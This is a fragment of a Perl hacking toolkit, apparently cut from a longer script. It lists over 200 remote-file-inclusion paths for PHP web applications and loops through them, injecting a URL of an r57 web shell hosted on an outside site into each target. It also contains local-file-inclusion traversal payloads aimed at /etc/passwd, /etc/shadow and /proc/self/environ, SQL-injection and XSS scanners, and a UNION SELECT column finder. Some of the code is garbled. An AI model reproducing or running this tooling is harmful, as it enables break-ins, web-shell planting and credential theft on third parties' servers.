$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path="; $rfi195="dkp/includes/dbal.php?eqdkp_root_path="; $rfi196="include/SQuery/gameSpy2.php?libpath="; $rfi197="include/global.php?GLOBALS[includeBit]="; $rfi198="topsites/config.php?returnpath="; $rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]="; $rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath="; $rfi201="forum/addpost_newpoll.php?thispath="; $rfi202="forums/addpost_newpoll.php?thispath="; $rfi203="ubbthreads/ubbt.inc.php?thispath="; $rfi204="forums/ubbt.inc.php?thispath="; $rfi205="forum/ubbt.inc.php?thispath="; $rfi206="forum/admin/addentry.php?phpbb_root_path="; $rfi207="admin/addentry.php?phpbb_root_path="; $rfi208="index.php?f="; $rfi209="index.php?act="; $rfi210="ipchat.php?root_path="; $rfi211="includes/orderSuccess.inc.php?glob[rootDir]="; $rfi212="stats.php?dir[func]=dir[base]="; $rfi213="ladder/stats.php?dir[base]="; $rfi214="ladders/stats.php?dir[base]="; $rfi215="sphider/admin/configset.php?settings_dir="; $rfi216="admin/configset.php?settings_dir="; $rfi217="vwar/admin/admin.php?vwar_root="; $rfi218="modules/vwar/admin/admin.php?vwar_root="; $rfi219="modules/vWar_Account/includes/get_header.php?vwar_root="; $rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2="; $rfi221="sphider/admin/configset.php?settings_dir="; $rfi222="admin/configset.php?settings_dir="; $rfi223="impex/ImpExData.php?systempath="; $rfi224="forum/impex/ImpExData.php?systempath="; $rfi225="forums/impex/ImpExData.php?systempath="; $rfi226="application.php?base_path="; $rfi227="index.php?theme_path="; $rfi228="become_editor.php?theme_path="; $rfi229="add.php?theme_path="; $rfi230="bad_link.php?theme_path="; $rfi231="browse.php?theme_path="; $rfi232="detail.php?theme_path="; $rfi233="fav.php?theme_path="; $rfi234="get_rated.php?theme_path="; $rfi235="login.php?theme_path="; $rfi236="mailing_list.php?theme_path="; $rfi237="new.php?theme_path="; $rfi238="modify.php?theme_path="; $rfi239="pick.php?theme_path="; $rfi240="power_search.php?theme_path="; $rfi241="rating.php?theme_path="; $rfi242="register.php?theme_path="; $rfi243="review.php?theme_path="; $rfi244="rss.php?theme_path="; $rfi245="search.php?theme_path="; $rfi246="send_pwd.php?theme_path="; $rfi247="sendmail.php?theme_path="; $rfi248="tell_friend.php?theme_path="; $rfi249="top_rated.php?theme_path="; $rfi250="user_detail.php?theme_path="; $rfi251="user_search.php?theme_path="; $rfi252="invoice.php?base_path="; $rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir="; $rfi254="cgi-bin/install/index.php?G_PATH="; $rfi255="cgi-bin/include/print_category.php?dir="; $rfi256="includes/class_template.php?quezza_root_path="; $rfi257="bazar/classified_right.php?language_dir="; $rfi258="classified_right.php?language_dir="; $rfi259="phpBazar/classified_right.php?language_dir="; $rfi260="chat/messagesL.php3?cmd="; $rfi261="phpMyChat/chat/messagesL.php3?cmd="; $rfi262="bbs/include/write.php?dir="; $rfi263="visitorupload.php?cmd="; $rfi264="modules/center/admin/accounts/process.php?module_path]="; $rfi265="index.php?template="; $rfi266="armygame.php?libpath="; $rfi267="lire.php?rub="; $rfi268="pathofhostadmin/?page="; $rfi269="apa_phpinclude.inc.php?apa_module_basedir="; $rfi270="index.php?req_path="; $rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root="; $rfi272="Farsi1/index.php?archive="; $rfi273="index.php?archive="; $rfi274="show_archives.php?template="; $rfi275="forum/include/common.php?pun_root="; $rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]="; $rfi277="vuln.php?="; $rfi278="cgi-bin//include/write.php?dir="; $rfi279="admin/common.inc.php?basepath="; $rfi280="pm/lib.inc.php?sfx="; $rfi281="pm/lib.inc.php?pm_path="; $rfi282="artmedic-kleinanzeigen-path/index.php?id="; $rfi283="osticket/include/main.php?include_dir="; $rfi284="include/main.php?config[search_disp]=include_dir="; $rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]="; $rfi286="quick_reply.php?phpbb_root_path="; $rfi287="zboard/include/write.php?dir="; $rfi288="admin/plog-admin-functions.php?configbasedir="; $rfi289="content.php?content="; $rfi290="q-news.php?id="; $rfi291="_conf/core/common-tpl-vars.php?confdir="; $rfi292="votebox.php?VoteBoxPath="; $rfi293="al_initialize.php?alpath="; $rfi294="include/db.php?GLOBALS[rootdp]="; $rfi295="modules/news/archivednews.php?GLOBALS[language_home]="; $rfi296="protection.php?siteurl="; $rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]="; $rfi298="index2.php?includes_dir="; $rfi299="classes.php?LOCAL_PATH="; $rfi300="extensions/moblog/moblog_lib.php?basedir="; $rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]="; $rfi302="phpWebLog/include/init.inc.php?G_PATH="; $rfi303="admin/objects.inc.php4?Server="; $rfi304="trg_news30/trgnews/install/article.php?dir="; $rfi305="block.php?Include="; $rfi306="arpuivo.php?data="; $rfi307="setup/index.php?GALLERY_BASEDIR="; $rfi308="include/help.php?base="; $rfi309="index.php?[Home]="; $rfi310="block.php?Include="; $rfi311="examples/phonebook.php?page="; $rfi312="PHPNews/auth.php?path="; $rfi313="include/print_category.php?dir="; $rfi314="skin/zero_vote/login.php?dir="; $rfi315="skin/zero_vote/setup.php?dir="; $rfi316="skin/zero_vote/ask_password.php?dir="; $rfi317="gui/include/sql.php?include_path="; $rfi318="webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini="; $rfi319="email.php?login=cer_skin="; $rfi320="PhotoGal/ops/gals.php?news_file="; $rfi321="index.php?custom="; $rfi322="loginout.php?cutepath="; $rfi323="oneadmin/config.php?path[docroot]="; $rfi324="xcomic/initialize.php?xcomicRootPath="; $rfi325="skin/zero_vote/setup.php?dir="; $rfi326="skin/zero_vote/error.php? dir="; $rfi327="admin_modules/admin_module_captions.inc.php?config[path_src_include]="; $rfi328="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]="; $rfi329="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]="; $rfi330="admin_modules/admin_module_edit.inc.php?config[path_src_include]="; $rfi331="admin_modules/admin_module_delimage.inc.php?config[path_src_include]="; $rfi332="admin_modules/admin_module_deldir.inc.php?config[path_src_include]="; $rfi333="src/index_overview.inc.php?config[path_src_include]="; $rfi334="src/index_leftnavbar.inc.php?config[path_src_include]="; $rfi335="src/index_image.inc.php?config[path_src_include]="; $rfi336="src/image-gd.class.php?config[path_src_include]="; $rfi337="src/image.class.php?config[path_src_include]="; $rfi338="src/album.class.php?config[path_src_include]="; $rfi339="src/show_random.inc.php?config[path_src_include]="; $rfi340="src/main.inc.php?config[path_src_include]="; $rfi341="src/index_passwd-admin.inc.php?config[path_admin_include]="; $rfi342="yappa-ng/src/index_overview.inc.php?config[path_src_include]="; $rfi343="admin_modules/admin_module_captions.inc.php?config[path_src_include]="; $rfi344="admin_modules/admin_module_rotimage.inc.php?config[path_src_include]="; $rfi345="admin_modules/admin_module_delcomments.inc.php?config[path_src_include]="; $rfi346="admin_modules/admin_module_edit.inc.php?config[path_src_include]="; $rfi347="admin_modules/admin_module_delimage.inc.php?config[path_src_include]="; $rfi348="admin_modules/admin_module_deldir.inc.php?config[path_src_include]="; $rfi349="src/index_overview.inc.php?config[path_src_include]="; $rfi350="src/image-gd.class.php?config[path_src_include]="; $rfi351="src/image.class.php?config[image_module]="; $rfi352="src/album.class.php?config[path_src_include]="; $rfi353="src/show_random.inc.php?config[path_src_include]="; $rfi353="src/main.inc.php?config[path_src_include]="; $rfi354="includes/db_adodb.php?baseDir="; $rfi355="includes/db_connect.php?baseDir="; $rfi356="includes/session.php?baseDir="; $rfi357="modules/projects/gantt.php?dPconfig[root_dir]="; $rfi358="modules/projects/gantt2.php?dPconfig[root_dir]="; $rfi359="modules/projects/vw_files.php?dPconfig[root_dir]="; $rfi360="modules/admin/vw_usr_roles.php?baseDir="; $rfi361="modules/public/calendar.php?baseDir="; $rfi362="modules/public/date_format.php?baseDir="; $rfi363="modules/tasks/gantt.php?baseDir="; $rfi364="mantis/login_page.php?g_****_include_file="; $rfi365="phpgedview/help_text_vars.php?PGV_BASE_DIRECTORY="; $rfi366="modules/My_eGallery/public/displayCategory.php?basepath="; $rfi367="dotproject/modules/files/index_table.php?root_dir="; $rfi368="nukebrowser.php?filnavn="; $rfi369="bug_sponsorship_list_view_inc.php?t_core_path="; $rfi370="modules/coppermine/themes/coppercop/theme.php?THEME_DIR="; $rfi371="modules/coppermine/themes/maze/theme.php?THEME_DIR="; $rfi372="modules/coppermine/include/init.inc.php?CPG_M_DIR="; $rfi373="includes/calendar.php?phpc_root_path="; $rfi374="includes/setup.php?phpc_root_path="; $rfi375="phpBB/admin/admin_styles.php?mode="; $rfi376="aMember/plugins/db/mysql/mysql.inc.php?config="; $rfi377="admin/lang.php?CMS_ADMIN_PAGE="; $rfi378="inc/pipe.php?HCL_path="; $rfi379="include/write.php?dir="; $rfi380="becommunity/community/index.php?pageurl="; $rfi381="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR="; $rfi382="modules/mod_mainmenu.php?mosConfig_absolute_path="; $rfi383="modules/agendax/addevent.inc.php?agendax_path="; $rfi384="shoutbox/expanded.php?conf="; $rfi385="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR="; $rfi386="index.php?page="; $rfi387="index.php?pag="; $rfi388="index.php?include="; $rfi389="index.php?content="; $rfi390="index.php?cont="; $rfi391="index.php?c="; $rfi392="modules/My_eGallery/index.php?basepath="; $rfi393="modules/newbb_plus/class/forumpollrenderer.php?bbPath="; $rfi394="journal.php?m="; $rfi395="index.php?m="; $rfi396="links.php?c="; $rfi397="forums.php?m="; $rfi398="list.php?c="; $rfi399="user.php?xoops_redirect="; $rfi400="index.php?id="; $rfi401="r.php?url="; $rfi402="CubeCart/includes/orderSuccess.inc.php?&glob[rootDir]="; $rfi403="inc/formmail.inc.php?script_root="; $rfi404="include/init.inc.php?G_PATH="; $rfi405="backend/addons/links/index.php?PATH="; $rfi406="modules/newbb_plus/class/class.forumposts.php?bbPath[path]="; $rfi407="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]="; $rfi408="protection.php?siteurl="; $rfi409="htmltonuke.php?filnavn="; $rfi410="mail_autocheck.php?pm_path="; $rfi411="index.php?p="; $rfi412="modules/4nAlbum/public/displayCategory.php?basepath="; $rfi413="e107/e107_handlers/secure_img_render.php?p="; $rfi414="include/new-visitor.inc.php?lvc_include_dir="; $rfi415="community/modules/agendax/addevent.inc.php?agendax_path="; $rfi416="library/editor/editor.php?root="; $rfi417="library/lib.php?root="; $rfi418="zentrack/index.php?configFile="; $rfi419="pivot/modules/module_db.php?pivot_path="; $rfi420="myPHPCalendar/admin.php?cal_dir="; $rfi421="index.php/main.php?x="; $rfi422="os/pointer.php?url="; $rfi423="p_uppc_francais/pages_php/p_aidcon_conseils/index.php?FM="; $rfi424="db.php?path_local="; $rfi425="phpGedView/individual.php?PGV_BASE_DIRECTORY="; $rfi426="index.php?kietu[url_hit]="; $rfi427="phorum/plugin/replace/plugin.php?PHORUM[settings_dir]="; $rfi428="Sources/Packages.php?sourcedir="; $rfi429="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path="; $rfi430="cgi-bin//gadgets/Blog/BlogModel.php?path=";   $int = $values[ rand(4) ]; for($int=1;$int<430;$int++){ @cmdgif="http://www.c99php.com/shell/r57.txt?"; $lol="rfi"; $asd=$lol.$int; $url2="http://".$host."/".$$asd."@cmdgif?"; my $req=HTTP::Request->new(GET=>$url2); my $ua=LWP::UserAgent->new(); $ua->timeout(10); my $response=$ua->request($req);   if ($response->is_success) { if( $response->content =~ /r57shell/ && $response->content =~ /by/ ){ open(FILE,">>file.txt"); print FILE "$url2\n"; close(FILE); print "$url2 is vulnerable..\n"; {goto Mainmenu;} }} } }   sub lfi_scanner {   use HTTP::Request; use LWP::UserAgent; system ("clear"); print q{   ################################# #        RFI SCANNER          # #################################     }; sleep (1); print "\n"; menu:; print "1. Passwd,Log"; print "Scan Files Of /etc/ Directory\n"; print "2. Environ"; print "Scan Environ File For Inject Shell By U-Agent\n";   print "\nEnter Your choise: "; $menu = <>; if ($menu =~ /1/){     goto lfi;     }     if ($menu =~ /2/){         goto env;     }     else {         print"\n\n";         print "\t\tUnknow Choise!\n";         goto menu;     };     lfi:;     print "\n\n";     print "\t\t\tWelcome To /etc/ Section\n\n";     print "\t Insert Target (http://www.target.com/index.php?page=)\n";     print "\t Target: ";     $host=<STDIN>;     chomp($host);     if($host !~ /http:\/\//) { $host = "http://$host"; };   print "\n\n"; print "[+]Working...\n"; print "\n\n"; @lfi = ('../etc/passwd', '../../etc/passwd', '../../../etc/passwd', '../../../../etc/passwd', '../../../../../etc/passwd', '../../../../../../etc/passwd', '../../../../../../../etc/passwd', '../../../../../../../../etc/passwd', '../../../../../../../../../etc/passwd', '../../../../../../../../../../etc/passwd', '../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../etc/passwd', '../../../../../../../../../../../../../../../../etc/passwd', '../../etc/passwd%00', '../../../etc/passwd%00', '../../../../etc/passwd%00', '../../../../../etc/passwd%00', '../../../../../../etc/passwd%00', '../../../../../../../etc/passwd%00', '../../../../../../../../etc/passwd%00', '../../../../../../../../../etc/passwd%00', '../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../../etc/passwd%00', '../../../../../../../../../../../../../../../../etc/passwd%00', '../etc/shadow', '../../etc/shadow', '../../../etc/shadow', '../../../../etc/shadow', '../../../../../etc/shadow', '../../../../../../etc/shadow', '../../../../../../../etc/shadow', '../../../../../../../../etc/shadow', '../../../../../../../../../etc/shadow', '../../../../../../../../../../etc/shadow', '../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../etc/shadow', '../../../../../../../../../../../../../../etc/shadow', '../etc/shadow%00', '../../etc/shadow%00', '../../../etc/shadow%00', '../../../../etc/shadow%00', '../../../../../etc/shadow%00', '../../../../../../etc/shadow%00', '../../../../../../../etc/shadow%00', '../../../../../../../../etc/shadow%00', '../../../../../../../../../etc/shadow%00', '../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../../etc/shadow%00', '../../../../../../../../../../../../../../etc/shadow%00', '../etc/group', '../../etc/group', '../../../etc/group', '../../../../etc/group', '../../../../../etc/group', '../../../../../../etc/group', '../../../../../../../etc/group', '../../../../../../../../etc/group', '../../../../../../../../../etc/group', '../../../../../../../../../../etc/group', '../../../../../../../../../../../etc/group', '../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../etc/group', '../../../../../../../../../../../../../../etc/group', '../etc/group%00', '../../etc/group%00', '../../../etc/group%00', '../../../../etc/group%00', '../../../../../etc/group%00', '../../../../../../etc/group%00', '../../../../../../../etc/group%00', '../../../../../../../../etc/group%00', '../../../../../../../../../etc/group%00', '../../../../../../../../../../etc/group%00', '../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../../etc/group%00', '../../../../../../../../../../../../../../etc/group%00', '../etc/security/group', '../../etc/security/group', '../../../etc/security/group', '../../../../etc/security/group', '../../../../../etc/security/group', '../../../../../../etc/security/group', '../../../../../../../etc/security/group', '../../../../../../../../etc/security/group', '../../../../../../../../../etc/security/group', '../../../../../../../../../../etc/security/group', '../../../../../../../../../../../etc/security/group', '../etc/security/group%00', '../../etc/security/group%00', '../../../etc/security/group%00', '../../../../etc/security/group%00', '../../../../../etc/security/group%00', '../../../../../../etc/security/group%00', '../../../../../../../etc/security/group%00', '../../../../../../../../etc/security/group%00', '../../../../../../../../../etc/security/group%00', '../../../../../../../../../../etc/security/group%00', '../../../../../../../../../../../etc/security/group%00', '../etc/security/passwd', '../../etc/security/passwd', '../../../etc/security/passwd', '../../../../etc/security/passwd', '../../../../../etc/security/passwd', '../../../../../../etc/security/passwd', '../../../../../../../etc/security/passwd', '../../../../../../../../etc/security/passwd', '../../../../../../../../../etc/security/passwd', '../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../etc/security/passwd', '../../../../../../../../../../../../../../etc/security/passwd', '../etc/security/passwd%00', '../../etc/security/passwd%00', '../../../etc/security/passwd%00', '../../../../etc/security/passwd%00', '../../../../../etc/security/passwd%00', '../../../../../../etc/security/passwd%00', '../../../../../../../etc/security/passwd%00', '../../../../../../../../etc/security/passwd%00', '../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../../../etc/security/passwd%00', '../../../../../../../../../../../../../../etc/security/passwd%00', '../etc/security/user', '../../etc/security/user', '../../../etc/security/user', '../../../../etc/security/user', '../../../../../etc/security/user', '../../../../../../etc/security/user', '../../../../../../../etc/security/user', '../../../../../../../../etc/security/user', '../../../../../../../../../etc/security/user', '../../../../../../../../../../etc/security/user', '../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../etc/security/user', '../../../../../../../../../../../../../etc/security/user', '../etc/security/user%00', '../../etc/security/user%00', '../../../etc/security/user%00', '../../../../etc/security/user%00', '../../../../../etc/security/user%00', '../../../../../../etc/security/user%00', '../../../../../../../etc/security/user%00', '../../../../../../../../etc/security/user%00', '../../../../../../../../../etc/security/user%00', '../../../../../../../../../../etc/security/user%00', '../../../../../../../../../../../etc/security/user%00', '../../../../../../../../../../../../etc/security/user%00', '../../../../../../../../../../../../../etc/security/user%00');     foreach $scan(@lfi){   $url = $host.$scan; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new();   $response = $useragent->request($request); if ($response->is_success && $response->content =~ /root:x:/) { $msg = Vulnerability;} else { $msg = "Not Found";} print "$scan..........[$msg]\n"; } env:; print "\n\n"; print "Insert Target (http://www.target.com/index.php?page=)\n"; print "Target :"; $host=<STDIN>; chomp($host); if($host !~ /http:\/\//) { $host = "http://$host"; };   print "\n\n"; print "[+]Working...\n"; print "\n\n";   @env = ('../proc/self/environ', '../../proc/self/environ', '../../../proc/self/environ', '../../../../proc/self/environ', '../../../../../proc/self/environ', '../../../../../../proc/self/environ', '../../../../../../../proc/self/environ', '../../../../../../../../proc/self/environ', '../../../../../../../../../proc/self/environ', '../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../../proc/self/environ', '../../../../../../../../../../../../../../proc/self/environ', '../proc/self/environ%00', '../../proc/self/environ%00', '../../../proc/self/environ%00', '../../../../proc/self/environ%00', '../../../../../proc/self/environ%00', '../../../../../../proc/self/environ%00', '../../../../../../../proc/self/environ%00', '../../../../../../../../proc/self/environ%00', '../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../../proc/self/environ%00', '../../../../../../../../../../../../../../proc/self/environ%00');   foreach $scan_env(@env){   $url = $host.$scan_env; $request = HTTP::Request->new(GET=>$url); $useragent = LWP::UserAgent->new();   $response = $useragent->request($request); if ($response->is_success && $response->content =~ /HTTP_ACCEPT/ && $response->content =~ /HTTP_HOST/) { $msg = Vulnerability;} else { $msg = "Not Found";} print "$scan_env..........[$msg]\n"; } {goto Mainmenu;}   sub sql_scanner {   print q{   ########################################### ##              SQL SCANNER            ## ###########################################     }; print "\nFilename with vuln sites(list):\n"; print "Ex: sites.txt, sqlvulntxt etc...\n\n";   chomp($list = <STDIN>);   system("$cmd");   print "Scanning! Please wait...\n\n";   open(LIST, "$list"); while(<LIST>) {   my $list = $_; chomp $list;   my $sql="'";   my $url=$list.$sql;   my $req=HTTP::Request->new(GET=>$url); my $ua=LWP::UserAgent->new(); $ua->timeout(15); my $resposta=$ua->request($req);   if($resposta->content =~ /You have an error in your SQL syntax/ || $resposta->content =~ /MySQL server version/ || $resposta->content =~ /Syntax error converting the nvarchar value/ || $resposta->content =~ /Unclosed quotation mark before/ || $resposta->content =~ /SQL Server error/ || $resposta->content =~ /JET/){ print "[+] Founded $url\n"; open(a, ">>sqlvulnlist.txt"); print a "$url\n"; close(a); }else{ print "[-] Not Found $url\n"; }} print "\nAll results will be saved in sqlvulnlist.txt\n"; print "\nPress ENTER To Return To Menu\n"; <STDIN>; goto Mainmenu; } sub xss_scanner {   print q{   ########################################### ##              XSS SCANNER            ## ###########################################     }; print "\nFilename with vuln sites(list):\n"; print "Ex: sites.txt, xssvulntxt etc...\n\n";   chomp($list = <STDIN>);   system("$cmd");   print "Scanning! Please wait...\n\n";   open(LIST, "$list"); while(<LIST>) {   my $list = $_; chomp $list;   my $xss= ('s[1]"><h1>XSS<?');   my $url=$list.$xss;   my $req=HTTP::Request->new(GET=>$url); my $ua=LWP::UserAgent->new(); $ua->timeout(15); my $response=$ua->request($req);   if($response->content =~ /XSS/){ print "[+] Found $url\n"; open(a, ">>xssvulnlist.txt"); print a "$url\n"; close(a); }else{ print "[-] Not Found $url\n"; } } print "\nAll results will be saved in xssvulnlist.txt\n"; print "\nPress ENTER To Return To Menu\n"; <STDIN>; goto Mainmenu; } sub sqlfinder {   use LWP::Simple; use LWP::UserAgent; use HTTP::Request;   print q{   ########################################### ##          SQL Column Finder            ## ###########################################     }; $add = "+"; $end = "--"; print "Target: "; $site = <STDIN>; print "\n\n"; print "Max number of columns to search: "; $max = <STDIN>; print "\n\n"; print "Press ENTER To Start Searching!\n"; <STDIN>; for ($i = 1; $i < $max; $i++) { $link = $site . $add . 'UNION' . $add . 'SELECT' . $add; $lol = ''; for ($lolz = 1; $lolz <= $i; $lolz++) { $lol .= sprintf('04041997%02d,', $lolz); } chop($lol); $link .= $lol . $end; print 'Trying column: '; print  "$i\n"; $web = LWP::UserAgent->new(agent => 'Mozilla 5.2'); $web->timeout(60); $response = $web->get($link); if ($response->is_success) { $_ = $response->content; s/$lol//g; if (/04041997\d{2}/) { print "\nFinal number of columns : " . $i . "\n\n"; $_ = $link; s/04041997//g; print "Final URL:\n\n" . $_ . "\n\n\n"; <STDIN>; goto Mainmenu; } } else { print "UPSSS! Error in website!\n"; <STDIN>; goto Mainmenu; } } print "\nFailed to find number of columns! :(\n"; <STDIN>; goto Mainmenu; } }
 
Üst Alt